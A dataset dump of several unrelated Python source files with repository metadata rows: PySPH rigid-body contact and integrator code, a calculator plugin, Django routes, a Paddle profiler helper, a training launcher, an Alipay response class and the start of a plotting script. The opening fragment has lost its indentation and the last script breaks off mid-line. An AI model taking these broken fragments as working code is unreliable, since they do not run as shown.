ft_z_d = -self.gamma_t * d_tang_velocity_z[d_idx]
ft_x_s = -self.kt * d_tang_disp_x[d_idx]
ft_y_s = -self.kt * d_tang_disp_y[d_idx]
ft_z_s = -self.kt * d_tang_disp_z[d_idx]
ft_x = ft_x_d + ft_x_s
ft_y = ft_y_d + ft_y_s
ft_z = ft_z_d + ft_z_s
ftij = sqrt((ft_x**2) + (ft_y**2) + (ft_z**2))
fnij = sqrt((fn_x**2) + (fn_y**2) + (fn_z**2))
_fnij = self.mu * fnij
if _fnij < ftij:
ft_x = -_fnij * tij_x
ft_y = -_fnij * tij_y
ft_z = -_fnij * tij_z
d_fx[d_idx] += fn_x + ft_x
d_fy[d_idx] += fn_y + ft_y
d_fz[d_idx] += fn_z + ft_z
else:
d_tang_velocity_x[d_idx] = 0
d_tang_velocity_y[d_idx] = 0
d_tang_velocity_z[d_idx] = 0
d_tang_disp_x[d_idx] = 0
d_tang_disp_y[d_idx] = 0
d_tang_disp_z[d_idx] = 0
class RigidBodyWallCollision(Equation):
    """DEM-style linear spring-dashpot contact force between rigid-body
    particles and a wall.

    The wall is described by boundary (source) particles carrying outward
    unit normals ``(s_nx, s_ny, s_nz)``.  A normal spring/damper resists
    penetration and a tangential spring/damper, capped by Coulomb friction
    ``|ft| <= mu * |fn|``, resists sliding.

    NOTE: this method is transpiled by PySPH; keep the body in the simple
    imperative style it is written in.
    """
    def __init__(self, dest, sources, kn=1e3, mu=0.5, en=0.8):
        """Initialise the contact-model parameters.

        Parameters
        ----------
        dest : str
            Destination (rigid body) particle array.
        sources : list
            Wall/boundary particle arrays providing the normals.
        kn : float
            Normal spring stiffness.
        mu : float
            Coulomb friction coefficient.
        en : float
            Coefficient of restitution used to derive the normal damping.
        """
        self.kn = kn
        # Common DEM choice: tangential stiffness kt = (2/7) * kn.
        self.kt = 2. / 7. * kn
        # NOTE(review): effective mass is hard-coded -- presumably the mass
        # of one particle (pi * r^2 * thickness? * density 2120); confirm it
        # matches the particle properties actually simulated.
        m_eff = np.pi * 0.5**2 * 1e-6 * 2120
        # Damping chosen so that `en` is the restitution coefficient of the
        # linear spring-dashpot model.
        self.gamma_n = -(2 * np.sqrt(kn * m_eff) * np.log(en)) / (
            np.sqrt(np.pi**2 + np.log(en)**2))
        # NOTE(review): debug print left in -- consider removing/logging.
        print(self.gamma_n)
        self.gamma_t = 0.5 * self.gamma_n
        self.mu = mu
        super(RigidBodyWallCollision, self).__init__(dest, sources)
    def loop(self, d_idx, d_fx, d_fy, d_fz, d_h, d_total_mass, d_rad_s,
             d_tang_disp_x, d_tang_disp_y, d_tang_disp_z, d_tang_velocity_x,
             d_tang_velocity_y, d_tang_velocity_z, s_idx, XIJ, RIJ,
             R2IJ, VIJ, s_nx, s_ny, s_nz):
        # Penetration depth of the particle past the wall plane, measured
        # along the wall normal stored on the source particle.
        overlap = d_rad_s[d_idx] - (XIJ[0] * s_nx[s_idx] + XIJ[1] *
                                    s_ny[s_idx] + XIJ[2] * s_nz[s_idx])
        if overlap > 0:
            # Contact normal points from the particle into the wall.
            nij_x = -s_nx[s_idx]
            nij_y = -s_ny[s_idx]
            nij_z = -s_nz[s_idx]
            # Normal component of the relative velocity.
            vijdotnij = VIJ[0] * nij_x + VIJ[1] * nij_y + VIJ[2] * nij_z
            vijn_x = vijdotnij * nij_x
            vijn_y = vijdotnij * nij_y
            vijn_z = vijdotnij * nij_z
            # Normal force: linear spring (repulsion) + dashpot (damping).
            fn_x = -self.kn * overlap * nij_x - self.gamma_n * vijn_x
            fn_y = -self.kn * overlap * nij_y - self.gamma_n * vijn_y
            fn_z = -self.kn * overlap * nij_z - self.gamma_n * vijn_z
            # Tangential relative velocity = total minus the normal part.
            d_tang_velocity_x[d_idx] = VIJ[0] - vijn_x
            d_tang_velocity_y[d_idx] = VIJ[1] - vijn_y
            d_tang_velocity_z[d_idx] = VIJ[2] - vijn_z
            _tang = (
                (d_tang_velocity_x[d_idx]**2) + (d_tang_velocity_y[d_idx]**2) +
                (d_tang_velocity_z[d_idx]**2))**(1. / 2.)
            # Unit tangent direction (left as zero when there is no sliding).
            tij_x = 0
            tij_y = 0
            tij_z = 0
            if _tang > 0:
                tij_x = d_tang_velocity_x[d_idx] / _tang
                tij_y = d_tang_velocity_y[d_idx] / _tang
                tij_z = d_tang_velocity_z[d_idx] / _tang
            # Tangential force: damping part plus a spring part driven by
            # the accumulated tangential displacement.
            ft_x_d = -self.gamma_t * d_tang_velocity_x[d_idx]
            ft_y_d = -self.gamma_t * d_tang_velocity_y[d_idx]
            ft_z_d = -self.gamma_t * d_tang_velocity_z[d_idx]
            ft_x_s = -self.kt * d_tang_disp_x[d_idx]
            ft_y_s = -self.kt * d_tang_disp_y[d_idx]
            ft_z_s = -self.kt * d_tang_disp_z[d_idx]
            ft_x = ft_x_d + ft_x_s
            ft_y = ft_y_d + ft_y_s
            ft_z = ft_z_d + ft_z_s
            # Coulomb cap: limit |ft| to mu * |fn| along the tangent.
            ftij = ((ft_x**2) + (ft_y**2) + (ft_z**2))**(1. / 2.)
            fnij = ((fn_x**2) + (fn_y**2) + (fn_z**2))**(1. / 2.)
            _fnij = self.mu * fnij
            if _fnij < ftij:
                ft_x = -_fnij * tij_x
                ft_y = -_fnij * tij_y
                ft_z = -_fnij * tij_z
            d_fx[d_idx] += fn_x + ft_x
            d_fy[d_idx] += fn_y + ft_y
            d_fz[d_idx] += fn_z + ft_z
        else:
            # No contact: reset the tangential spring state.
            d_tang_velocity_x[d_idx] = 0
            d_tang_velocity_y[d_idx] = 0
            d_tang_velocity_z[d_idx] = 0
            d_tang_disp_x[d_idx] = 0
            d_tang_disp_y[d_idx] = 0
            d_tang_disp_z[d_idx] = 0
class EulerStepRigidBody(IntegratorStep):
    """Single-stage (forward Euler) integrator step for rigid bodies.

    Per-body centre-of-mass velocity ``d_vc`` and angular velocity
    ``d_omega`` are stored as flat arrays of 3 components per body.
    NOTE: transpiled by PySPH -- keep the imperative style.
    """
    def initialize(self):
        pass
    def stage1(self, d_idx, d_u, d_v, d_w, d_x, d_y, d_z,
               d_omega, d_omega_dot, d_vc, d_ac, d_num_body,
               dt=0.0):
        # Loop counters must be declared for the PySPH transpiler.
        _i = declare('int')
        _j = declare('int')
        base = declare('int')
        # Update the per-body state once per step: only the thread that
        # handles particle 0 walks over all bodies.
        if d_idx == 0:
            for _i in range(d_num_body[0]):
                base = 3*_i
                for _j in range(3):
                    d_vc[base + _j] += d_ac[base + _j]*dt
                    d_omega[base + _j] += d_omega_dot[base + _j]*dt
        # Advance every particle position with its rigid-body velocity.
        d_x[d_idx] += dt*d_u[d_idx]
        d_y[d_idx] += dt*d_v[d_idx]
        d_z[d_idx] += dt*d_w[d_idx]
class RK2StepRigidBody(IntegratorStep):
    """Two-stage (midpoint / RK2) integrator step for rigid bodies.

    ``initialize`` snapshots the start-of-step state into the ``*0``
    arrays; ``stage1`` advances half a step from that snapshot and
    ``stage2`` a full step.  Per-body quantities (``d_vc``, ``d_omega``)
    are flat arrays with 3 components per body.
    NOTE: transpiled by PySPH -- keep the imperative style.
    """
    def initialize(self, d_idx, d_x, d_y, d_z, d_x0, d_y0, d_z0,
                   d_omega, d_omega0, d_vc, d_vc0, d_num_body):
        _i = declare('int')
        _j = declare('int')
        base = declare('int')
        # Snapshot per-body velocities once; only the particle-0 thread
        # iterates over all bodies.
        if d_idx == 0:
            for _i in range(d_num_body[0]):
                base = 3*_i
                for _j in range(3):
                    d_vc0[base + _j] = d_vc[base + _j]
                    d_omega0[base + _j] = d_omega[base + _j]
        # Snapshot each particle's position.
        d_x0[d_idx] = d_x[d_idx]
        d_y0[d_idx] = d_y[d_idx]
        d_z0[d_idx] = d_z[d_idx]
    def stage1(self, d_idx, d_u, d_v, d_w, d_x, d_y, d_z, d_x0, d_y0, d_z0,
               d_omega, d_omega_dot, d_vc, d_ac, d_omega0, d_vc0, d_num_body,
               dt=0.0):
        # Half step from the saved state.
        dtb2 = 0.5*dt
        _i = declare('int')
        j = declare('int')
        base = declare('int')
        if d_idx == 0:
            for _i in range(d_num_body[0]):
                base = 3*_i
                for j in range(3):
                    d_vc[base + j] = d_vc0[base + j] + d_ac[base + j]*dtb2
                    d_omega[base + j] = (d_omega0[base + j] +
                                         d_omega_dot[base + j]*dtb2)
        d_x[d_idx] = d_x0[d_idx] + dtb2*d_u[d_idx]
        d_y[d_idx] = d_y0[d_idx] + dtb2*d_v[d_idx]
        d_z[d_idx] = d_z0[d_idx] + dtb2*d_w[d_idx]
    def stage2(self, d_idx, d_u, d_v, d_w, d_x, d_y, d_z, d_x0, d_y0, d_z0,
               d_omega, d_omega_dot, d_vc, d_ac, d_omega0, d_vc0, d_num_body,
               dt=0.0):
        # Full step from the saved state using midpoint derivatives.
        _i = declare('int')
        j = declare('int')
        base = declare('int')
        if d_idx == 0:
            for _i in range(d_num_body[0]):
                base = 3*_i
                for j in range(3):
                    d_vc[base + j] = d_vc0[base + j] + d_ac[base + j]*dt
                    d_omega[base + j] = (d_omega0[base + j] +
                                         d_omega_dot[base + j]*dt)
        d_x[d_idx] = d_x0[d_idx] + dt*d_u[d_idx]
        d_y[d_idx] = d_y0[d_idx] + dt*d_v[d_idx]
        d_z[d_idx] = d_z0[d_idx] + dt*d_w[d_idx]
| true | true |
f72ee556b494b4e5facd04b0cd2dbe2c186e4740 | 1,156 | py | Python | plugins/math/komand_math/actions/calculate/action.py | lukaszlaszuk/insightconnect-plugins | 8c6ce323bfbb12c55f8b5a9c08975d25eb9f8892 | [
"MIT"
] | 46 | 2019-06-05T20:47:58.000Z | 2022-03-29T10:18:01.000Z | plugins/math/komand_math/actions/calculate/action.py | lukaszlaszuk/insightconnect-plugins | 8c6ce323bfbb12c55f8b5a9c08975d25eb9f8892 | [
"MIT"
] | 386 | 2019-06-07T20:20:39.000Z | 2022-03-30T17:35:01.000Z | plugins/math/komand_math/actions/calculate/action.py | lukaszlaszuk/insightconnect-plugins | 8c6ce323bfbb12c55f8b5a9c08975d25eb9f8892 | [
"MIT"
] | 43 | 2019-07-09T14:13:58.000Z | 2022-03-28T12:04:46.000Z | import insightconnect_plugin_runtime
from .schema import CalculateInput, CalculateOutput, Input, Output, Component
from insightconnect_plugin_runtime.exceptions import PluginException
from simpleeval import simple_eval
class Calculate(insightconnect_plugin_runtime.Action):
    """Action that sanitises and evaluates a basic arithmetic equation."""

    _result = None

    def __init__(self):
        super(self.__class__, self).__init__(
            name="calculate",
            description=Component.DESCRIPTION,
            input=CalculateInput(),
            output=CalculateOutput(),
        )

    def run(self, params=None):
        """Evaluate the equation from the action input.

        :param params: action input dict containing ``Input.EQUATION``
        :return: dict mapping ``Output.RESULT`` to the numeric result
        :raises PluginException: if the equation evaluates to ``None``
        """
        # Use a None sentinel instead of the mutable-default `params={}`
        # anti-pattern; behavior for callers is unchanged.
        params = params or {}
        equation = params.get(Input.EQUATION)
        result = Calculate.execute_equation(equation)
        if result is None:
            raise PluginException(
                cause="Calculation error",
                assistance="Error occurred while calculating the equation. Check to make sure it is valid and try "
                "again. ",
            )
        return {Output.RESULT: result}

    @staticmethod
    def execute_equation(eq):
        """Strip the equation to a safe character whitelist and evaluate it.

        Only decimal digits and basic arithmetic characters survive the
        filter.  Exponentiation ('**') still works because each '*' passes
        individually; the original whitelist's '**' entry was dead code,
        since a single character can never equal a two-character string.
        """
        allowed = {"+", "-", "*", "/", "%", "(", ")", "."}
        eq = "".join(c for c in eq if c.isdecimal() or c in allowed)
        return simple_eval(eq)
| 33.028571 | 115 | 0.622837 | import insightconnect_plugin_runtime
from .schema import CalculateInput, CalculateOutput, Input, Output, Component
from insightconnect_plugin_runtime.exceptions import PluginException
from simpleeval import simple_eval
class Calculate(insightconnect_plugin_runtime.Action):
_result = None
def __init__(self):
super(self.__class__, self).__init__(
name="calculate",
description=Component.DESCRIPTION,
input=CalculateInput(),
output=CalculateOutput(),
)
def run(self, params={}):
equation = params.get(Input.EQUATION)
result = Calculate.execute_equation(equation)
if result is None:
raise PluginException(
cause="Calculation error",
assistance="Error occurred while calculating the equation. Check to make sure it is valid and try "
"again. ",
)
return {Output.RESULT: result}
@staticmethod
def execute_equation(eq):
eq = str().join([c for c in eq if (c.isdecimal() or c in ["+", "-", "*", "/", "**", "%", "(", ")", "."])])
return simple_eval(eq)
| true | true |
f72ee7470b394ffe1d61f50214d906f893d3278c | 937 | py | Python | server/api/urls.py | di-unipi-socc/MicroAnalyserServer | aa066df5cf329328e82c1d72cf09ddc249887a64 | [
"MIT"
] | 13 | 2019-10-01T20:23:38.000Z | 2021-11-24T09:14:04.000Z | server/api/urls.py | di-unipi-socc/microFreshener | aa066df5cf329328e82c1d72cf09ddc249887a64 | [
"MIT"
] | 21 | 2019-11-04T15:29:23.000Z | 2022-02-26T10:41:20.000Z | server/api/urls.py | di-unipi-socc/MicroAnalyserServer | aa066df5cf329328e82c1d72cf09ddc249887a64 | [
"MIT"
] | 2 | 2021-10-11T07:48:36.000Z | 2021-12-14T21:02:03.000Z | # api/urls.py
from django.contrib import admin
from django.urls import include, path
from rest_framework.urlpatterns import format_suffix_patterns
from api import view
urlpatterns = [
    # MicroTOSCA model CRUD and analysis endpoints.
    path('model', view.graph),
    path('analyse', view.graph_analysis),
    path('export', view.graph_export),
    path('import', view.graph_import),
    # Istio-specific refinement must precede the generic 'refine' route.
    path('refine/istio', view.graph_refine_istio),
    path('refine', view.graph_refine),
    path('example', view.graph_examples),
    # team api
    # path('team/', view.team, name='microtosca-team'),
    path('team/<str:team_name>', view.team_detail, name='microtosca-team-get'),
]
# Let clients request a representation via a format suffix (e.g. .json).
urlpatterns = format_suffix_patterns(urlpatterns)
# We don't necessarily need to add these extra url patterns in,
# but it gives us a simple, clean way of referring to a specific format.
# http http://127.0.0.1:8000/snippets.json # JSON suffix
# http http://127.0.0.1:8000/snippets.api # Browsable API suffix
| 34.703704 | 79 | 0.721451 |
from django.contrib import admin
from django.urls import include, path
from rest_framework.urlpatterns import format_suffix_patterns
from api import view
urlpatterns = [
path('model', view.graph),
path('analyse', view.graph_analysis),
path('export', view.graph_export),
path('import', view.graph_import),
path('refine/istio', view.graph_refine_istio),
path('refine', view.graph_refine),
path('example', view.graph_examples),
path('team/<str:team_name>', view.team_detail, name='microtosca-team-get'),
]
urlpatterns = format_suffix_patterns(urlpatterns)
# but it gives us a simple, clean way of referring to a specific format.
# http http://127.0.0.1:8000/snippets.json # JSON suffix
# http http://127.0.0.1:8000/snippets.api # Browsable API suffix
| true | true |
f72ee8622daf69c1cb94611e88480ed29b8c08ab | 4,390 | py | Python | paddlers/models/ppdet/utils/profiler.py | Xiaracto/PaddleRS | 6e9b99a79fe740775daff310bd1ca3e6fbc86f80 | [
"Apache-2.0"
] | 1 | 2022-03-30T10:59:58.000Z | 2022-03-30T10:59:58.000Z | paddlers/models/ppdet/utils/profiler.py | wondering516/PaddleRS | b6f7033f3c0ca7bc6952456c0a0f53eef6c1c07f | [
"Apache-2.0"
] | null | null | null | paddlers/models/ppdet/utils/profiler.py | wondering516/PaddleRS | b6f7033f3c0ca7bc6952456c0a0f53eef6c1c07f | [
"Apache-2.0"
] | null | null | null | # Copyright (c) 2022 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
import paddle
# A global variable to record the number of calling times for profiler
# functions. It is used to specify the tracing range of training steps.
_profiler_step_id = 0
# A global variable to avoid parsing from string every time.
_profiler_options = None
class ProfilerOptions(object):
    '''
    Use a string to initialize a ProfilerOptions.
    The string should be in the format: "key1=value1;key2=value;key3=value3".
    For example:
      "profile_path=model.profile"
      "batch_range=[50, 60]; profile_path=model.profile"
      "batch_range=[50, 60]; tracer_option=OpDetail; profile_path=model.profile"
    ProfilerOptions supports following key-value pair:
      batch_range        - a integer list, e.g. [100, 110].
      state              - a string, the optional values are 'CPU', 'GPU' or 'All'.
      sorted_key         - a string, the optional values are 'calls', 'total',
                           'max', 'min' or 'ave.
      tracer_option      - a string, the optional values are 'Default', 'OpDetail',
                           'AllOpDetail'.
      profile_path       - a string, the path to save the serialized profile data,
                           which can be used to generate a timeline.
      exit_on_finished   - a boolean.
    '''

    def __init__(self, options_str):
        assert isinstance(options_str, str)

        # Defaults used for any key absent from (or invalid in) the string.
        self._options = {
            'batch_range': [10, 20],
            'state': 'All',
            'sorted_key': 'total',
            'tracer_option': 'Default',
            'profile_path': '/tmp/profile',
            'exit_on_finished': True
        }
        self._parse_from_string(options_str)

    def _parse_from_string(self, options_str):
        # Parse "k1=v1;k2=v2" pairs; unknown keys are silently ignored.
        for kv in options_str.replace(' ', '').split(';'):
            if not kv:
                # Tolerate empty segments (e.g. a trailing ';'); the
                # original `kv.split('=')` raised ValueError here.
                continue
            # partition keeps any further '=' inside the value intact.
            key, _, value = kv.partition('=')
            if key == 'batch_range':
                value_list = value.replace('[', '').replace(']', '').split(',')
                value_list = list(map(int, value_list))
                # Only accept a well-formed, increasing, non-negative range;
                # otherwise keep the default.
                if len(value_list) >= 2 and value_list[0] >= 0 and value_list[
                        1] > value_list[0]:
                    self._options[key] = value_list
            elif key == 'exit_on_finished':
                self._options[key] = value.lower() in ("yes", "true", "t", "1")
            elif key in [
                    'state', 'sorted_key', 'tracer_option', 'profile_path'
            ]:
                self._options[key] = value

    def __getitem__(self, name):
        if self._options.get(name, None) is None:
            raise ValueError(
                "ProfilerOptions does not have an option named %s." % name)
        return self._options[name]
def add_profiler_step(options_str=None):
    '''
    Enable the operator-level timing using PaddlePaddle's profiler.
    The profiler uses a independent variable to count the profiler steps.
    One call of this function is treated as a profiler step.
    Args:
      profiler_options - a string to initialize the ProfilerOptions.
                         Default is None, and the profiler is disabled.
    '''
    if options_str is None:
        return

    global _profiler_step_id
    global _profiler_options

    # Parse the options string only once, on the first profiled step.
    if _profiler_options is None:
        _profiler_options = ProfilerOptions(options_str)

    start_step, stop_step = _profiler_options['batch_range']
    if _profiler_step_id == start_step:
        paddle.utils.profiler.start_profiler(
            _profiler_options['state'], _profiler_options['tracer_option'])
    elif _profiler_step_id == stop_step:
        paddle.utils.profiler.stop_profiler(
            _profiler_options['sorted_key'], _profiler_options['profile_path'])
        if _profiler_options['exit_on_finished']:
            sys.exit(0)

    _profiler_step_id += 1
| 39.196429 | 81 | 0.628246 |
import sys
import paddle
_profiler_step_id = 0
_profiler_options = None
class ProfilerOptions(object):
def __init__(self, options_str):
assert isinstance(options_str, str)
self._options = {
'batch_range': [10, 20],
'state': 'All',
'sorted_key': 'total',
'tracer_option': 'Default',
'profile_path': '/tmp/profile',
'exit_on_finished': True
}
self._parse_from_string(options_str)
def _parse_from_string(self, options_str):
for kv in options_str.replace(' ', '').split(';'):
key, value = kv.split('=')
if key == 'batch_range':
value_list = value.replace('[', '').replace(']', '').split(',')
value_list = list(map(int, value_list))
if len(value_list) >= 2 and value_list[0] >= 0 and value_list[
1] > value_list[0]:
self._options[key] = value_list
elif key == 'exit_on_finished':
self._options[key] = value.lower() in ("yes", "true", "t", "1")
elif key in [
'state', 'sorted_key', 'tracer_option', 'profile_path'
]:
self._options[key] = value
def __getitem__(self, name):
if self._options.get(name, None) is None:
raise ValueError(
"ProfilerOptions does not have an option named %s." % name)
return self._options[name]
def add_profiler_step(options_str=None):
if options_str is None:
return
global _profiler_step_id
global _profiler_options
if _profiler_options is None:
_profiler_options = ProfilerOptions(options_str)
if _profiler_step_id == _profiler_options['batch_range'][0]:
paddle.utils.profiler.start_profiler(
_profiler_options['state'], _profiler_options['tracer_option'])
elif _profiler_step_id == _profiler_options['batch_range'][1]:
paddle.utils.profiler.stop_profiler(_profiler_options['sorted_key'],
_profiler_options['profile_path'])
if _profiler_options['exit_on_finished']:
sys.exit(0)
_profiler_step_id += 1
| true | true |
f72ee96b3252f32009b52b97e42cb9a9308172b4 | 2,405 | py | Python | tools/train.py | yoxu515/aot-benchmark | 5a7665fc8e0f0e64bc8ba6028b15d9ab32f4c56a | [
"BSD-3-Clause"
] | 105 | 2021-11-16T12:43:59.000Z | 2022-03-31T08:05:11.000Z | tools/train.py | lingyunwu14/aot-benchmark | 99f74f051c91ac221e44f3edab3534ae4dd233f7 | [
"BSD-3-Clause"
] | 14 | 2021-11-18T09:52:36.000Z | 2022-03-31T16:26:32.000Z | tools/train.py | lingyunwu14/aot-benchmark | 99f74f051c91ac221e44f3edab3534ae4dd233f7 | [
"BSD-3-Clause"
] | 17 | 2021-11-16T13:28:29.000Z | 2022-03-29T02:14:48.000Z | import importlib
import random
import sys
sys.setrecursionlimit(10000)
sys.path.append('.')
sys.path.append('..')
import torch.multiprocessing as mp
from networks.managers.trainer import Trainer
def main_worker(gpu, cfg, enable_amp=True):
    """Entry point for one (distributed) training process on rank `gpu`."""
    # Build the training manager for this rank and run sequential training.
    worker = Trainer(rank=gpu, cfg=cfg, enable_amp=enable_amp)
    worker.sequential_training()
def main():
    """Parse CLI arguments, build the stage configuration and launch training."""
    import argparse
    parser = argparse.ArgumentParser(description="Train VOS")
    parser.add_argument('--exp_name', type=str, default='')
    parser.add_argument('--stage', type=str, default='pre')
    parser.add_argument('--model', type=str, default='aott')

    parser.add_argument('--start_gpu', type=int, default=0)
    parser.add_argument('--gpu_num', type=int, default=-1)
    parser.add_argument('--batch_size', type=int, default=-1)
    parser.add_argument('--dist_url', type=str, default='')
    parser.add_argument('--amp', action='store_true')
    parser.set_defaults(amp=False)

    parser.add_argument('--pretrained_path', type=str, default='')

    parser.add_argument('--datasets', nargs='+', type=str, default=[])
    parser.add_argument('--lr', type=float, default=-1.)
    # These are integer arguments, so use integer sentinel defaults (the
    # originals used -1., a float, which argparse leaves unconverted).
    parser.add_argument('--total_step', type=int, default=-1)
    parser.add_argument('--start_step', type=int, default=-1)

    args = parser.parse_args()

    # Stage-specific configuration module, e.g. configs.pre.
    engine_config = importlib.import_module('configs.' + args.stage)
    cfg = engine_config.EngineConfig(args.exp_name, args.model)

    # Command-line overrides are applied only when explicitly provided
    # (the sentinel defaults are negative or empty).
    if len(args.datasets) > 0:
        cfg.DATASETS = args.datasets

    cfg.DIST_START_GPU = args.start_gpu
    if args.gpu_num > 0:
        cfg.TRAIN_GPUS = args.gpu_num
    if args.batch_size > 0:
        cfg.TRAIN_BATCH_SIZE = args.batch_size

    if args.pretrained_path != '':
        cfg.PRETRAIN_MODEL = args.pretrained_path

    if args.lr > 0:
        cfg.TRAIN_LR = args.lr

    if args.total_step > 0:
        cfg.TRAIN_TOTAL_STEPS = args.total_step

    if args.start_step > 0:
        cfg.TRAIN_START_STEP = args.start_step

    if args.dist_url == '':
        # Quasi-random local port in [12300, 12399] for the DDP rendezvous.
        cfg.DIST_URL = 'tcp://127.0.0.1:123' + str(random.randint(0, 9)) + str(
            random.randint(0, 9))
    else:
        cfg.DIST_URL = args.dist_url

    # Use torch.multiprocessing.spawn to launch one process per GPU.
    mp.spawn(main_worker, nprocs=cfg.TRAIN_GPUS, args=(cfg, args.amp))
main()
| 30.0625 | 79 | 0.675676 | import importlib
import random
import sys
sys.setrecursionlimit(10000)
sys.path.append('.')
sys.path.append('..')
import torch.multiprocessing as mp
from networks.managers.trainer import Trainer
def main_worker(gpu, cfg, enable_amp=True):
trainer = Trainer(rank=gpu, cfg=cfg, enable_amp=enable_amp)
trainer.sequential_training()
def main():
import argparse
parser = argparse.ArgumentParser(description="Train VOS")
parser.add_argument('--exp_name', type=str, default='')
parser.add_argument('--stage', type=str, default='pre')
parser.add_argument('--model', type=str, default='aott')
parser.add_argument('--start_gpu', type=int, default=0)
parser.add_argument('--gpu_num', type=int, default=-1)
parser.add_argument('--batch_size', type=int, default=-1)
parser.add_argument('--dist_url', type=str, default='')
parser.add_argument('--amp', action='store_true')
parser.set_defaults(amp=False)
parser.add_argument('--pretrained_path', type=str, default='')
parser.add_argument('--datasets', nargs='+', type=str, default=[])
parser.add_argument('--lr', type=float, default=-1.)
parser.add_argument('--total_step', type=int, default=-1.)
parser.add_argument('--start_step', type=int, default=-1.)
args = parser.parse_args()
engine_config = importlib.import_module('configs.' + args.stage)
cfg = engine_config.EngineConfig(args.exp_name, args.model)
if len(args.datasets) > 0:
cfg.DATASETS = args.datasets
cfg.DIST_START_GPU = args.start_gpu
if args.gpu_num > 0:
cfg.TRAIN_GPUS = args.gpu_num
if args.batch_size > 0:
cfg.TRAIN_BATCH_SIZE = args.batch_size
if args.pretrained_path != '':
cfg.PRETRAIN_MODEL = args.pretrained_path
if args.lr > 0:
cfg.TRAIN_LR = args.lr
if args.total_step > 0:
cfg.TRAIN_TOTAL_STEPS = args.total_step
if args.start_step > 0:
cfg.TRAIN_START_STEP = args.start_step
if args.dist_url == '':
cfg.DIST_URL = 'tcp://127.0.0.1:123' + str(random.randint(0, 9)) + str(
random.randint(0, 9))
else:
cfg.DIST_URL = args.dist_url
mp.spawn(main_worker, nprocs=cfg.TRAIN_GPUS, args=(cfg, args.amp))
if __name__ == '__main__':
main()
| true | true |
f72eea59e503d70ee01dac7d729bac23d7d76c56 | 1,283 | py | Python | alipay/aop/api/response/AlipayInsUnderwriteUserPolicyQueryResponse.py | articuly/alipay-sdk-python-all | 0259cd28eca0f219b97dac7f41c2458441d5e7a6 | [
"Apache-2.0"
] | null | null | null | alipay/aop/api/response/AlipayInsUnderwriteUserPolicyQueryResponse.py | articuly/alipay-sdk-python-all | 0259cd28eca0f219b97dac7f41c2458441d5e7a6 | [
"Apache-2.0"
] | null | null | null | alipay/aop/api/response/AlipayInsUnderwriteUserPolicyQueryResponse.py | articuly/alipay-sdk-python-all | 0259cd28eca0f219b97dac7f41c2458441d5e7a6 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import simplejson as json
from alipay.aop.api.response.AlipayResponse import AlipayResponse
from alipay.aop.api.domain.InsPolicy import InsPolicy
class AlipayInsUnderwriteUserPolicyQueryResponse(AlipayResponse):
    """Response wrapper for the alipay.ins.underwrite.user.policy.query API."""

    def __init__(self):
        super(AlipayInsUnderwriteUserPolicyQueryResponse, self).__init__()
        self._policys = None
        self._total = None

    @property
    def policys(self):
        # List of InsPolicy objects returned by the query.
        return self._policys

    @policys.setter
    def policys(self, value):
        if isinstance(value, list):
            # Accept both ready-made InsPolicy objects and raw dicts.
            self._policys = [
                item if isinstance(item, InsPolicy)
                else InsPolicy.from_alipay_dict(item)
                for item in value
            ]

    @property
    def total(self):
        # Total number of policies matching the query.
        return self._total

    @total.setter
    def total(self, value):
        self._total = value

    def parse_response_content(self, response_content):
        """Populate the typed fields from the raw gateway response payload."""
        response = super(AlipayInsUnderwriteUserPolicyQueryResponse,
                         self).parse_response_content(response_content)
        if 'policys' in response:
            self.policys = response['policys']
        if 'total' in response:
            self.total = response['total']
import simplejson as json
from alipay.aop.api.response.AlipayResponse import AlipayResponse
from alipay.aop.api.domain.InsPolicy import InsPolicy
class AlipayInsUnderwriteUserPolicyQueryResponse(AlipayResponse):
def __init__(self):
super(AlipayInsUnderwriteUserPolicyQueryResponse, self).__init__()
self._policys = None
self._total = None
@property
def policys(self):
return self._policys
@policys.setter
def policys(self, value):
if isinstance(value, list):
self._policys = list()
for i in value:
if isinstance(i, InsPolicy):
self._policys.append(i)
else:
self._policys.append(InsPolicy.from_alipay_dict(i))
@property
def total(self):
return self._total
@total.setter
def total(self, value):
self._total = value
def parse_response_content(self, response_content):
response = super(AlipayInsUnderwriteUserPolicyQueryResponse, self).parse_response_content(response_content)
if 'policys' in response:
self.policys = response['policys']
if 'total' in response:
self.total = response['total']
| true | true |
f72eead581d421c3d44843fa5cbdc580e431a508 | 9,270 | py | Python | Manuscript-figures/xcorr_lag_composite.py | ehultee/helheim-fiesta | ed4e3f4ceac58137c1a4066941783a5c38d29c9b | [
"MIT"
] | null | null | null | Manuscript-figures/xcorr_lag_composite.py | ehultee/helheim-fiesta | ed4e3f4ceac58137c1a4066941783a5c38d29c9b | [
"MIT"
] | null | null | null | Manuscript-figures/xcorr_lag_composite.py | ehultee/helheim-fiesta | ed4e3f4ceac58137c1a4066941783a5c38d29c9b | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Six-panel xcorr *and* lag
Created on Thu Feb 4 18:21:08 2021
@author: lizz
"""
## ---- Colormap / normalisation choices ------------------------------------
## Top row shows the amplitude of maximum cross-correlation (divergent map);
## bottom row shows the lag (in days) at which that maximum occurs.
div_colors = 'RdBu'  # divergent colormap for xcorr
corrnorm_min, corrnorm_max = -0.3, 0.3
lag_colors = 'Greens'
lagnorm_min, lagnorm_max = 0, 365

## set matplotlib font size defaults
SMALL_SIZE = 10
MEDIUM_SIZE = 12
BIGGER_SIZE = 14
plt.rc('font', size=SMALL_SIZE)          # controls default text sizes
plt.rc('axes', titlesize=BIGGER_SIZE)    # fontsize of the axes title
plt.rc('axes', labelsize=MEDIUM_SIZE)    # fontsize of the x and y labels
plt.rc('xtick', labelsize=SMALL_SIZE)    # fontsize of the tick labels
plt.rc('ytick', labelsize=SMALL_SIZE)    # fontsize of the tick labels
plt.rc('legend', fontsize=SMALL_SIZE)    # legend fontsize
plt.rc('figure', titlesize=BIGGER_SIZE)  # fontsize of the figure title

## Marker shapes: circles for significant points, crosses for insignificant.
sig_markers = ['o', 'x']

## black-white hillshade topo underneath
rgb2 = ls.shade(np.asarray(b_hel), cmap=plt.get_cmap('gray'), blend_mode='overlay',
